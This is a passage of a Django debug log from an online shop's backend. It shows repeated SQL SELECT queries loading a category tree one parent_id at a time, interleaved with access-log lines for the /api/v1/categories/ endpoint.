SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:43:28,528 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:43:28,530 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:43:28,534 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:43:28,538 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:43:28] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:44:22,208 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:44:22,219 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:44:22,225 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:44:22,229 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:44:22,235 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:44:22,239 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:44:22,243 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:44:22,247 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:44:22,251 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:44:22,258 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:44:22,262 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:44:22,265 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:44:22,269 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:44:22,273 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:44:22,280 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:44:22,284 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:44:22,288 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:44:22,292 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:44:22,296 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:44:22,303 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:44:22,306 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:44:22,310 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:44:22,314 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:44:22,318 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:44:22,323 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:44:22,329 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:44:22,334 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:44:22,338 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:44:22,342 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:44:22,346 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:44:22,352 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:44:22,356 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:44:22,360 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:44:22,364 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:44:22,367 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:44:22,371 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:44:22,373 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:44:22,375 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:44:22,377 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:44:22,380 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:44:22,382 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:44:22,385 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:44:22,387 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:44:22,390 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:44:22,392 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:44:22,394 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:44:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:45:11,141 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:45:11,148 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:45:11,153 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:45:11,155 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:45:11,158 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:45:11,161 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:45:11,165 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:45:11,169 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:45:11,172 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:45:11,177 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:45:11,180 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:45:11,182 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:45:11,184 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:45:11,187 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:45:11,190 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:45:11,192 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:45:11,195 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 